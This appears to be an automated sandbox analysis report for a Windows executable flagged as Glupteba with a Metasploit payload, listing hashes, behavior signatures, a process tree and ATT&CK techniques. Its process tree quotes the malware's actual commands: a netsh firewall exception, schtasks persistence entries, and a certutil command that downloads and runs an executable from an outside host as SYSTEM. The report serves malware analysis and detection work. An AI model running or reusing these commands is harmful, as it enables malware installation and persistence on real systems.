Analysis

  • max time kernel
    172s
  • max time network
    208s
  • platform
    windows7_x64
  • resource
    win7-20221111-en
  • resource tags

    arch:x64arch:x86image:win7-20221111-enlocale:en-usos:windows7-x64system
  • submitted
    29-01-2023 18:32

General

  • Target

    5f3248f2c25a744211d4c4d877a8d2f81c6b57e1411482169d95eeb74c063eeb.exe

  • Size

    3.9MB

  • MD5

    7fc701478f1d43c3e62ff6d9c434ee77

  • SHA1

    790ba947810a29810ca9d5738abc6b03c9805cce

  • SHA256

    5f3248f2c25a744211d4c4d877a8d2f81c6b57e1411482169d95eeb74c063eeb

  • SHA512

    d1ede33eeeb3d5d2dd44f73fda21bef9ae60c6a9c10d71aa9d5b57d2b233c7793f7b0e1deea1bf74f5084191bc86afa5ccb60803051efbe9491a3960a515e456

  • SSDEEP

    98304:p1q76W1ZJJMknyymHzEnewyOzDFWmrqwKd:pox1Kkny1Xd2Doe5u

Malware Config

Extracted

Family

metasploit

Version

windows/single_exec

Signatures

  • Glupteba

    Glupteba is a modular loader written in Golang with various components.

  • Glupteba payload 9 IoCs
  • MetaSploit

    Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.

  • Windows security bypass 2 TTPs 10 IoCs
  • Executes dropped EXE 1 IoCs
  • Modifies Windows Firewall 1 TTPs 1 IoCs
  • Loads dropped DLL 2 IoCs
  • Windows security modification 2 TTPs 10 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Drops file in Windows directory 2 IoCs
  • Creates scheduled task(s) 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Modifies data under HKEY_USERS 64 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 11 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\5f3248f2c25a744211d4c4d877a8d2f81c6b57e1411482169d95eeb74c063eeb.exe
    "C:\Users\Admin\AppData\Local\Temp\5f3248f2c25a744211d4c4d877a8d2f81c6b57e1411482169d95eeb74c063eeb.exe"
    1⤵
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    PID:620
    • C:\Users\Admin\AppData\Local\Temp\5f3248f2c25a744211d4c4d877a8d2f81c6b57e1411482169d95eeb74c063eeb.exe
      "C:\Users\Admin\AppData\Local\Temp\5f3248f2c25a744211d4c4d877a8d2f81c6b57e1411482169d95eeb74c063eeb.exe"
      2⤵
      • Windows security bypass
      • Loads dropped DLL
      • Windows security modification
      • Adds Run key to start application
      • Drops file in Windows directory
      • Modifies data under HKEY_USERS
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      PID:1792
      • C:\Windows\system32\cmd.exe
        C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:888
        • C:\Windows\system32\netsh.exe
          netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
          4⤵
          • Modifies Windows Firewall
          • Modifies data under HKEY_USERS
          PID:432
      • C:\Windows\rss\csrss.exe
        C:\Windows\rss\csrss.exe ""
        3⤵
        • Executes dropped EXE
        • Modifies data under HKEY_USERS
        PID:300
        • C:\Windows\system32\schtasks.exe
          schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
          4⤵
          • Creates scheduled task(s)
          PID:1092
        • C:\Windows\system32\schtasks.exe
          schtasks /CREATE /SC ONLOGON /RL HIGHEST /RU SYSTEM /TR "cmd.exe /C certutil.exe -urlcache -split -f https://fotamene.com/app/app.exe C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe /31340" /TN ScheduledUpdate /F
          4⤵
          • Creates scheduled task(s)
          PID:1924
  • C:\Windows\system32\makecab.exe
    "C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20230129193402.log C:\Windows\Logs\CBS\CbsPersist_20230129193402.cab
    1⤵
      PID:1768

    Network

    MITRE ATT&CK Matrix ATT&CK v6

    Execution

    Scheduled Task

    1
    T1053

    Persistence

    Modify Existing Service

    1
    T1031

    Registry Run Keys / Startup Folder

    1
    T1060

    Scheduled Task

    1
    T1053

    Privilege Escalation

    Scheduled Task

    1
    T1053

    Defense Evasion

    Disabling Security Tools

    2
    T1089

    Modify Registry

    3
    T1112

    Discovery

    Query Registry

    1
    T1012

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Windows\rss\csrss.exe
      Filesize

      3.9MB

      MD5

      7fc701478f1d43c3e62ff6d9c434ee77

      SHA1

      790ba947810a29810ca9d5738abc6b03c9805cce

      SHA256

      5f3248f2c25a744211d4c4d877a8d2f81c6b57e1411482169d95eeb74c063eeb

      SHA512

      d1ede33eeeb3d5d2dd44f73fda21bef9ae60c6a9c10d71aa9d5b57d2b233c7793f7b0e1deea1bf74f5084191bc86afa5ccb60803051efbe9491a3960a515e456

    • \Windows\rss\csrss.exe
      Filesize

      3.9MB

      MD5

      7fc701478f1d43c3e62ff6d9c434ee77

      SHA1

      790ba947810a29810ca9d5738abc6b03c9805cce

      SHA256

      5f3248f2c25a744211d4c4d877a8d2f81c6b57e1411482169d95eeb74c063eeb

      SHA512

      d1ede33eeeb3d5d2dd44f73fda21bef9ae60c6a9c10d71aa9d5b57d2b233c7793f7b0e1deea1bf74f5084191bc86afa5ccb60803051efbe9491a3960a515e456

    • \Windows\rss\csrss.exe
      Filesize

      3.9MB

      MD5

      7fc701478f1d43c3e62ff6d9c434ee77

      SHA1

      790ba947810a29810ca9d5738abc6b03c9805cce

      SHA256

      5f3248f2c25a744211d4c4d877a8d2f81c6b57e1411482169d95eeb74c063eeb

      SHA512

      d1ede33eeeb3d5d2dd44f73fda21bef9ae60c6a9c10d71aa9d5b57d2b233c7793f7b0e1deea1bf74f5084191bc86afa5ccb60803051efbe9491a3960a515e456

    • memory/300-75-0x0000000000400000-0x0000000000C1F000-memory.dmp
      Filesize

      8.1MB

    • memory/300-71-0x0000000000DE0000-0x0000000001188000-memory.dmp
      Filesize

      3.7MB

    • memory/300-73-0x0000000001190000-0x0000000001995000-memory.dmp
      Filesize

      8.0MB

    • memory/300-68-0x0000000000000000-mapping.dmp
    • memory/300-74-0x0000000000400000-0x0000000000C1F000-memory.dmp
      Filesize

      8.1MB

    • memory/300-72-0x0000000000DE0000-0x0000000001188000-memory.dmp
      Filesize

      3.7MB

    • memory/432-62-0x0000000000000000-mapping.dmp
    • memory/432-63-0x000007FEFBCD1000-0x000007FEFBCD3000-memory.dmp
      Filesize

      8KB

    • memory/620-59-0x0000000000400000-0x0000000000C1F000-memory.dmp
      Filesize

      8.1MB

    • memory/620-54-0x0000000000EF0000-0x0000000001298000-memory.dmp
      Filesize

      3.7MB

    • memory/620-58-0x0000000000400000-0x0000000000C1F000-memory.dmp
      Filesize

      8.1MB

    • memory/620-57-0x0000000000400000-0x0000000000C1F000-memory.dmp
      Filesize

      8.1MB

    • memory/620-56-0x00000000012A0000-0x0000000001AA5000-memory.dmp
      Filesize

      8.0MB

    • memory/620-55-0x0000000000EF0000-0x0000000001298000-memory.dmp
      Filesize

      3.7MB

    • memory/888-61-0x0000000000000000-mapping.dmp
    • memory/1792-60-0x0000000000C90000-0x0000000001038000-memory.dmp
      Filesize

      3.7MB

    • memory/1792-70-0x0000000000400000-0x0000000000C1F000-memory.dmp
      Filesize

      8.1MB

    • memory/1792-65-0x0000000000400000-0x0000000000C1F000-memory.dmp
      Filesize

      8.1MB

    • memory/1792-64-0x0000000000C90000-0x0000000001038000-memory.dmp
      Filesize

      3.7MB